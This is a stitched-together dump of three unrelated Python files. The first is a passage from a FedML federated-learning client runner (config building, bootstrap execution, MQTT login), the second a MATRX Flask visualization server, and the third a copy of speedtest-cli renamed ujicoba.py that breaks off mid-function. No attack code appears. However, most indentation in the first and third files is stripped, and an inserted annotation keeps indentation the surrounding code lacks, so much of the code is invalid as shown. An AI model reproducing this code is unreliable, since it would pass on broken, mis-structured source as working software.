fedml_package_home_dir = os.path.join(home_dir, "fedml-client")
# Dynamically build constrain variable with realtime parameters from server
self.build_dynamic_constrain_variables(run_id, run_config, fedml_package_home_dir)
# Update entry arguments value with constrain variable values with realtime parameters from server
        # currently we support the following constrain variables:
        # ${FEDSYS.RUN_ID}: a run id that represents one entire Federated Learning flow
        # ${FEDSYS.PRIVATE_LOCAL_DATA}: private local data path in the Federated Learning client
        # ${FEDSYS.CLIENT_ID_LIST}: client list in one entire Federated Learning flow
        # ${FEDSYS.SYNTHETIC_DATA_URL}: synthetic data url from server;
        # if this value is not null, the client will download data from this URL to use it as
        # federated training data set
        # ${FEDSYS.IS_USING_LOCAL_DATA}: whether to use private local data as the federated training data set
container_dynamic_args_config["data_cache_dir"] = "${FEDSYS.PRIVATE_LOCAL_DATA}"
for constrain_variable_key, constrain_variable_value in self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES.items():
for argument_key, argument_value in container_dynamic_args_config.items():
if argument_value is not None and str(argument_value).find(constrain_variable_key) == 0:
replaced_argument_value = str(argument_value).replace(constrain_variable_key,
str(constrain_variable_value))
container_dynamic_args_config[argument_key] = replaced_argument_value
# Merge all container new config sections as new config dictionary
container_config_to_yaml = dict()
container_config_to_yaml["entry_config"] = container_entry_file_config
container_config_to_yaml["dynamic_args"] = container_dynamic_args_config
container_config_to_yaml["dynamic_args"]["config_version"] = self.args.config_version
container_dynamic_args_config["mqtt_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"mqtt_config_path"]))
container_dynamic_args_config["s3_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"s3_config_path"]))
log_file_dir = os.path.join(fedml_package_home_dir, "fedml", "logs")
try:
os.makedirs(log_file_dir)
except Exception as e:
pass
container_config_to_yaml["dynamic_args"]["log_file_dir"] = log_file_dir
# Save new config dictionary to local file
fedml_updated_config_file = os.path.join(unzip_package_path, "conf", "fedml.yaml")
FedMLClientRunner.generate_yaml_doc(container_config_to_yaml, fedml_updated_config_file)
# Build dynamic arguments and set arguments to fedml config object
self.build_dynamic_args(container_config_to_yaml, unzip_package_path)
return unzip_package_path, container_config_to_yaml
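    # Editor's illustrative sketch, not part of the original FedML source: the
    # ${FEDSYS.*} placeholder substitution performed in
    # update_local_fedml_config() above, in isolation. A value is replaced
    # only when it starts with a known placeholder key, mirroring the
    # find(...) == 0 test used there.
    @staticmethod
    def example_substitute_constrain_variables(dynamic_args, variables):
        for variable_key, variable_value in variables.items():
            for argument_key, argument_value in dynamic_args.items():
                if argument_value is not None and str(argument_value).find(variable_key) == 0:
                    dynamic_args[argument_key] = str(argument_value).replace(
                        variable_key, str(variable_value))
        return dynamic_args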
def build_dynamic_args(self, package_conf_object, base_dir):
fedml_conf_file = package_conf_object["entry_config"]["conf_file"]
print("fedml_conf_file:" + fedml_conf_file)
fedml_conf_path = os.path.join(base_dir, "fedml", "config", os.path.basename(fedml_conf_file))
fedml_conf_object = load_yaml_config(fedml_conf_path)
package_dynamic_args = package_conf_object["dynamic_args"]
fedml_conf_object["comm_args"]["mqtt_config_path"] = package_dynamic_args["mqtt_config_path"]
fedml_conf_object["comm_args"]["s3_config_path"] = package_dynamic_args["s3_config_path"]
fedml_conf_object["common_args"]["using_mlops"] = True
fedml_conf_object["train_args"]["run_id"] = package_dynamic_args["run_id"]
fedml_conf_object["train_args"]["client_id_list"] = package_dynamic_args["client_id_list"]
fedml_conf_object["train_args"]["client_num_in_total"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["train_args"]["client_num_per_round"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["device_args"]["worker_num"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["data_args"]["data_cache_dir"] = package_dynamic_args["data_cache_dir"]
fedml_conf_object["tracking_args"]["log_file_dir"] = package_dynamic_args["log_file_dir"]
fedml_conf_object["tracking_args"]["log_server_url"] = package_dynamic_args["log_server_url"]
bootstrap_script_file = fedml_conf_object["environment_args"]["bootstrap"]
bootstrap_script_path = os.path.join(base_dir, "fedml", "config", os.path.basename(bootstrap_script_file))
try:
os.makedirs(package_dynamic_args["data_cache_dir"])
except Exception as e:
pass
fedml_conf_object["dynamic_args"] = package_dynamic_args
FedMLClientRunner.generate_yaml_doc(fedml_conf_object, fedml_conf_path)
try:
bootstrap_stat = os.stat(bootstrap_script_path)
os.chmod(bootstrap_script_path, bootstrap_stat.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
os.system(bootstrap_script_path)
except Exception as e:
click.echo("Exception when executing bootstrap.sh: {}", traceback.format_exc())
def build_image_unique_id(self, run_id, run_config):
config_name = str(run_config.get("configName", "run_" + str(run_id)))
config_creater = str(run_config.get("userId", "user_" + str(run_id)))
image_unique_id = re.sub('[^a-zA-Z0-9_-]', '', str(config_name + "_" + config_creater))
image_unique_id = image_unique_id.lower()
return image_unique_id
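# Example (hypothetical inputs): configName="My Run!" and userId="42" become
# "My Run!_42", then "MyRun_42" after the regex strips disallowed characters,
# and finally "myrun_42" once lowercased.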
def run(self):
click.echo("start_run: " + json.dumps(self.request_json))
run_id = self.request_json["runId"]
run_config = self.request_json["run_config"]
data_config = run_config["data_config"]
packages_config = run_config["packages_config"]
# get training params
private_local_data_dir = data_config.get("privateLocalData", "")
is_using_local_data = 0
# if private_local_data_dir is not None and len(str(private_local_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
# start a run according to the hyper-parameters
# fedml_local_data_dir = self.cur_dir + "/fedml_data/run_" + str(run_id) + "_edge_" + str(edge_id)
fedml_local_data_dir = os.path.join(self.cur_dir, "fedml_data")
fedml_local_config_dir = os.path.join(self.cur_dir, "fedml_config")
if is_using_local_data:
fedml_local_data_dir = private_local_data_dir
self.fedml_data_dir = self.fedml_data_local_package_dir
# update local config with real time parameters from server and dynamically replace variables value
unzip_package_path, fedml_config_object = self.update_local_fedml_config(run_id, run_config)
entry_file_config = fedml_config_object["entry_config"]
dynamic_args_config = fedml_config_object["dynamic_args"]
entry_file = os.path.basename(entry_file_config["entry_file"])
conf_file = entry_file_config["conf_file"]
FedMLClientRunner.cleanup_edge_learning_process()
os.chdir(os.path.join(unzip_package_path, "fedml"))
python_program = 'python'
python_version_str = os.popen("python --version").read()
if python_version_str.find("Python 3.") == -1:
python_version_str = os.popen("python3 --version").read()
if python_version_str.find("Python 3.") != -1:
python_program = 'python3'
process = subprocess.Popen([python_program, entry_file,
'--cf', conf_file, '--rank', str(dynamic_args_config["rank"])])
FedMLClientRunner.save_edge_learning_process(process.pid)
process.wait()
self.reset_devices_status(self.edge_id)
def reset_devices_status(self, edge_id):
# if self.client_mqtt_mgr is None:
# self.client_mqtt_mgr = MqttManager(
# self.agent_config["mqtt_config"]["BROKER_HOST"],
# self.agent_config["mqtt_config"]["BROKER_PORT"],
# self.agent_config["mqtt_config"]["MQTT_USER"],
# self.agent_config["mqtt_config"]["MQTT_PWD"],
# self.agent_config["mqtt_config"]["MQTT_KEEPALIVE"],
# "FLClient_Agent-Train",
# )
# mlops_logger = MLOpsMetrics()
# mlops_logger.set_messenger(self.client_mqtt_mgr)
self.mlops_metrics.report_client_training_status(edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
time.sleep(3)
def stop_run(self):
if self.process is not None:
try:
self.process.terminate()
self.process.join()
self.process = None
except Exception as e:
pass
FedMLClientRunner.cleanup_edge_learning_process()
FedMLClientRunner.cleanup_edge_run_process()
click.echo("Stop run successfully.")
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
def callback_start_train(self, topic, payload):
click.echo("callback_start_train: topic = %s, payload = %s" % (topic, payload))
# get training params
request_json = json.loads(payload)
run_id = request_json["runId"]
# Terminate previous process about starting or stopping run command
if self.process is not None:
try:
self.process.terminate()
self.process.join()
self.process = None
except Exception as e:
pass
FedMLClientRunner.cleanup_edge_run_process()
# Start cross-silo server with multi processing mode
self.request_json = request_json
self.container_name = "fedml_container_run_" + str(run_id) + "_edge_" + str(self.edge_id)
self.process = multiprocessing.Process(target=self.run)
self.process.start()
FedMLClientRunner.save_edge_run_process(self.process.pid)
#self.run()
def callback_stop_train(self, topic, payload):
click.echo("callback_stop_train: topic = %s, payload = %s" % (topic, payload))
# Notify MLOps with the stopping message
self.mlops_metrics.report_client_training_status(self.edge_id,
MqttManager.MSG_MLOPS_CLIENT_STATUS_STOPPING)
request_json = json.loads(payload)
run_id = request_json["runId"]
click.echo("Stopping run...")
click.echo("Stop run with multiprocessing.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
self.container_name = "fedml_container_run_" + str(run_id) + "_edge_" + str(self.edge_id)
multiprocessing.Process(target=self.stop_run).start()
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
def cleanup_client_with_finished_status(self):
self.stop_run()
@staticmethod
def cleanup_edge_run_process():
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-sub-process.id")
edge_process_info = load_yaml_config(edge_process_id_file)
edge_process_id = edge_process_info.get('process_id', None)
if edge_process_id is not None:
try:
edge_process = psutil.Process(edge_process_id)
for edge_sub_process in edge_process.children():
os.kill(edge_sub_process.pid, signal.SIGTERM)
if edge_process is not None:
os.kill(edge_process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
@staticmethod
def save_edge_run_process(edge_process_id):
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-sub-process.id")
yaml_object = {}
yaml_object['process_id'] = edge_process_id
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
@staticmethod
def cleanup_edge_learning_process():
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-learning-process.id")
edge_process_info = load_yaml_config(edge_process_id_file)
edge_process_id = edge_process_info.get('process_id', None)
if edge_process_id is not None:
try:
edge_process = psutil.Process(edge_process_id)
for edge_sub_process in edge_process.children():
os.kill(edge_sub_process.pid, signal.SIGTERM)
if edge_process is not None:
os.kill(edge_process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
@staticmethod
def save_edge_learning_process(edge_learning_id):
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-learning-process.id")
yaml_object = {}
yaml_object['process_id'] = edge_learning_id
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
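# Both process-id bookkeeping files ("edge-sub-process.id" and
# "edge-learning-process.id") are one-line YAML documents written via
# generate_yaml_doc, e.g.:
# process_id: 12345
# A value of -1 marks the slot as cleaned up.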
def callback_client_status(self, topic, payload):
click.echo("callback_client_status: topic = %s, payload = %s" % (topic, payload))
request_json = json.loads(payload)
run_id = request_json["run_id"]
status = request_json["status"]
if status == MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED:
click.echo("Received training finished message.")
if self.process is not None:
try:
self.process.terminate()
self.process.join()
self.process = None
except Exception as e:
pass
click.echo("Stopping training client.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
self.container_name = "fedml_container_run_" + str(run_id) + "_edge_" + str(self.edge_id)
multiprocessing.Process(target=self.cleanup_client_with_finished_status).start()
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
@staticmethod
def get_device_id():
if "nt" in os.name:
device_id = subprocess.Popen("dmidecode.exe -s system-uuid".split())
elif "posix" in os.name:
device_id = hex(uuid.getnode())
else:
device_id = subprocess.Popen(
"hal-get-property --udi /org/freedesktop/Hal/devices/computer --key system.hardware.uuid".split()
)
return device_id
def bind_account_and_device_id(self, url, account_id, device_id, os_name):
json_params = {"accountid": account_id, "deviceid": device_id, "type": os_name,
"gpu": "None", "processor": "", "network": ""}
if str(url).startswith("https://"):
cur_source_dir = os.path.dirname(__file__)
cert_path = os.path.join(cur_source_dir, "ssl", "open.fedml.ai_bundle.crt")
requests.session().verify = cert_path
response = requests.post(url, json=json_params, verify=True, headers={'Connection': 'close'})
else:
response = requests.post(url, json=json_params, headers={'Connection': 'close'})
status_code = response.json().get("code")
if status_code == "SUCCESS":
edge_id = response.json().get("data").get("id")
else:
return 0
return edge_id
def fetch_configs(self):
url = "https://open.fedml.ai/fedmlOpsServer/configs/fetch"
if hasattr(self.args, "config_version") and self.args.config_version is not None:
# Setup config url based on selected version.
if self.args.config_version == "release":
url = "https://open.fedml.ai/fedmlOpsServer/configs/fetch"
elif self.args.config_version == "test":
url = "http://open-test.fedml.ai/fedmlOpsServer/configs/fetch"
elif self.args.config_version == "dev":
url = "http://open-dev.fedml.ai/fedmlOpsServer/configs/fetch"
elif self.args.config_version == "local":
url = "http://localhost:9000/fedmlOpsServer/configs/fetch"
json_params = {"config_name": ["mqtt_config", "s3_config", "ml_ops_config", "docker_config"]}
if str(url).startswith("https://"):
cur_source_dir = os.path.dirname(__file__)
cert_path = os.path.join(cur_source_dir, "ssl", "open.fedml.ai_bundle.crt")
requests.session().verify = cert_path
response = requests.post(url, json=json_params, verify=True, headers={'Connection': 'close'})
else:
response = requests.post(url, json=json_params, headers={'Connection': 'close'})
status_code = response.json().get("code")
if status_code == "SUCCESS":
mqtt_config = response.json().get("data").get("mqtt_config")
s3_config = response.json().get("data").get("s3_config")
mlops_config = response.json().get("data").get("ml_ops_config")
docker_config = response.json().get("data").get("docker_config")
else:
raise Exception("failed to fetch device configurations!")
return mqtt_config, s3_config, mlops_config, docker_config
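# Shape of the config-fetch response implied by the parsing above
# (field names from the code; values are illustrative):
# {"code": "SUCCESS",
#  "data": {"mqtt_config": {...}, "s3_config": {...},
#           "ml_ops_config": {...}, "docker_config": {...}}}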
def setup_mqtt_connection(self, service_config):
# Setup MQTT connection
self.mqtt_mgr = MqttManager(
service_config["mqtt_config"]["BROKER_HOST"],
service_config["mqtt_config"]["BROKER_PORT"],
service_config["mqtt_config"]["MQTT_USER"],
service_config["mqtt_config"]["MQTT_PWD"],
service_config["mqtt_config"]["MQTT_KEEPALIVE"],
self.edge_id,
)
self.mlops_metrics = MLOpsMetrics()
self.mlops_metrics.set_messenger(self.mqtt_mgr)
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_IDLE)
# Setup MQTT message listener for starting training
topic_start_train = "flserver_agent/" + str(self.edge_id) + "/start_train"
self.mqtt_mgr.add_message_listener(topic_start_train, self.callback_start_train)
# Setup MQTT message listener for stopping training
topic_stop_train = "flserver_agent/" + str(self.edge_id) + "/stop_train"
self.mqtt_mgr.add_message_listener(topic_stop_train, self.callback_stop_train)
# Setup MQTT message listener for client status switching
topic_client_status = "fl_client/mlops/" + str(self.edge_id) + "/status"
self.mqtt_mgr.add_message_listener(topic_client_status, self.callback_client_status)
# Start MQTT message loop
self.mqtt_mgr.loop_forever()
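# Topic layout wired up above, for a hypothetical edge_id of 17:
# flserver_agent/17/start_train  -> callback_start_train
# flserver_agent/17/stop_train   -> callback_stop_train
# fl_client/mlops/17/status      -> callback_client_status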
def __login_internal(userid, version):
# Build arguments for client runner.
try:
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# default arguments
parser.add_argument("login", help="Login to MLOps platform (open.fedml.ai)")
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='account id at open.fedml.ai MLOps platform')
parser.add_argument("--version", "-v", type=str, default="release")
parser.add_argument("--docker", "-d", type=str, default="false")
args = parser.parse_args()
except Exception as e:
click.echo("Failed to parse arguments for login: {}".format(e))
return
__login(args, userid, version)
def save_edge_infos(unique_device_id, edge_id):
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
os.makedirs(local_pkg_data_dir, exist_ok=True)
edge_info_file = os.path.join(local_pkg_data_dir, "edge_infos.yaml")
with open(edge_info_file, 'w', encoding='utf-8') as edge_info_file_handle:
edge_info_file_handle.writelines(["unique_device_id: {}\n".format(str(unique_device_id)),
"edge_id: {}\n".format(str(edge_id))])
def __login(args, userid, version):
setattr(args, "account_id", userid)
home_dir = expanduser("~")
setattr(args, "current_running_dir", os.path.join(home_dir, "fedml-client"))
sys_name = platform.system()
if sys_name == "Darwin":
sys_name = "MacOS"
setattr(args, "os_name", sys_name)
setattr(args, "version", "dev")
if version == "local":
setattr(args, "version", "local")
setattr(args, "log_file_dir", os.path.join(args.current_running_dir, "fedml", "logs"))
setattr(args, "device_id", FedMLClientRunner.get_device_id())
setattr(args, "config_version", version)
setattr(args, "cloud_region", "")
# Create client runner for communication with the FedML server.
client_runner = FedMLClientRunner(args, '')
# Fetch configs from the MLOps config server.
service_config = dict()
config_try_count = 0
edge_id = 0
while config_try_count < 5:
try:
mqtt_config, s3_config, mlops_config, docker_config = client_runner.fetch_configs()
service_config["mqtt_config"] = mqtt_config
service_config["s3_config"] = s3_config
service_config["ml_ops_config"] = mlops_config
service_config["docker_config"] = docker_config
client_runner.agent_config = service_config
break
except Exception as e:
config_try_count += 1
time.sleep(3)
continue
if config_try_count >= 5:
click.echo("Oops, you failed to login the FedML MLOps platform.")
click.echo("Please check whether your network is normal!")
return
# Build unique device id
if args.device_id is not None and len(str(args.device_id)) > 0:
unique_device_id = "@" + args.device_id + "." + args.os_name
# Bind account id to the MLOps platform.
register_try_count = 0
edge_id = 0
while register_try_count < 5:
try:
edge_id = client_runner.bind_account_and_device_id(
service_config["ml_ops_config"]["EDGE_BINDING_URL"], args.account_id, unique_device_id, args.os_name
)
if edge_id > 0:
client_runner.edge_id = edge_id
break
except Exception as e:
register_try_count += 1
time.sleep(3)
continue
if edge_id <= 0:
click.echo("Oops, you failed to login the FedML MLOps platform.")
click.echo("Please check whether your network is normal!")
return
# Log arguments and binding results.
click.echo(args)
click.echo("login: unique_device_id = %s" % str(unique_device_id))
click.echo("login: edge_id = %s" % str(edge_id))
save_edge_infos(args.device_id + "." + args.os_name, edge_id)
click.echo("Congratulations, you have logged into the FedML MLOps platform successfully!")
click.echo("Your device id is " + str(unique_device_id) + ". You may review the device in the MLOps edge device list.")
# Setup MQTT connection for communication with the FedML server.
client_runner.setup_mqtt_connection(service_config)
def login(args):
__login(args, args.user, args.version)
def logout():
FedMLClientRunner.cleanup_edge_run_process()
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--type", "-t", help="Login or logout to MLOps platform (open.fedml.ai)")
parser.add_argument("--user", "-u", type=str,
help='account id at open.fedml.ai MLOps platform')
parser.add_argument("--version", "-v", type=str, default="release")
args = parser.parse_args()
click.echo(args)
if args.type == 'login':
args.user = int(args.user)
login(args)
else:
logout()
|
visualization_server.py | import threading
import logging
from flask import Flask, render_template, request, jsonify
'''
This file holds the code for the MATRX RESTful API.
External scripts can send POST and/or GET requests to retrieve state, tick and other information, and send
user input or other information to MATRX. The API is a Flask (Python) webserver.
For visualization, see the separate MATRX visualization folder / package.
'''
debug = True
port = 3000
app = Flask(__name__, template_folder='templates', static_folder='static/')
#########################################################################
# Visualization server routes
#########################################################################
@app.route('/human-agent/<id>')
def human_agent_view(id):
"""
Route for HumanAgentBrain
Parameters
----------
id
The human agent ID. Is obtained from the URL.
Returns
-------
str
The template for this agent's view.
"""
return render_template('human_agent.html', id=id)
# route for agent, get the ID from the URL
@app.route('/agent/<id>')
def agent_view(id):
"""
Route for AgentBrain
Parameters
----------
id
The agent ID. Is obtained from the URL.
Returns
-------
str
The template for this agent's view.
"""
return render_template('agent.html', id=id)
@app.route('/god')
def god_view():
"""
Route for the 'god' view which contains the ground truth of the world without restrictions.
Returns
-------
str
The template for this view.
"""
return render_template('god.html')
@app.route('/')
@app.route('/start')
def start_view():
"""
Route for the 'start' view which shows information about the current scenario, including links to all agents.
Returns
-------
str
The template for this view.
"""
return render_template('start.html')
@app.route('/shutdown_visualizer', methods=['GET', 'POST'])
def shutdown():
""" Shuts down the visualizer by stopping the Flask thread
Returns
True
-------
"""
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Unable to shutdown visualizer server. Not running with the Werkzeug Server')
func()
print("Visualizer server shutting down...")
return jsonify(True)
#########################################################################
# Visualization Flask methods
#########################################################################
def flask_thread():
"""
Starts the Flask server on localhost:3000
"""
if not debug:
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
app.run(host='0.0.0.0', port=port, debug=False, use_reloader=False)
def run_matrx_visualizer(verbose):
"""
Creates a separate Python thread in which the visualization server (Flask) is started, serving the JS visualization
:return: MATRX visualization Python thread
"""
global debug
debug = verbose
print("Starting visualization server")
print("Initialized app:", app)
vis_thread = threading.Thread(target=flask_thread)
vis_thread.start()
return vis_thread
if __name__ == "__main__":
run_matrx_visualizer(verbose=True) |
ujicoba.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.3.1'
# Some global variables we use
source = None
shutdown_event = None
import os
import re
import sys
import math
import signal
import socket
import timeit
import threading
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1))
* math.cos(math.radians(lat2)) * math.sin(dlon / 2)
* math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
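# Rough sanity check for distance() (coordinates and result approximate):
# distance((40.7128, -74.0060), (51.5074, -0.1278)) is about 5570 km,
# the great-circle distance from New York to London.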
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
f = urlopen(self.url)
while not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
f = urlopen(self.url, self.data)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
uh = urlopen('http://www.speedtest.net/speedtest-config.php')
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError:
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
uh = urlopen('http://www.speedtest.net/speedtest-servers-static.php')
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError:
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
print_('Failed to parse list of speedtest.net servers')
sys.exit(1)
servers = {}
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']), float(client['lon'])],
[float(attrib.get('lat')), float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
start = timeit.default_timer()
h.request("GET", urlparts[2])
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
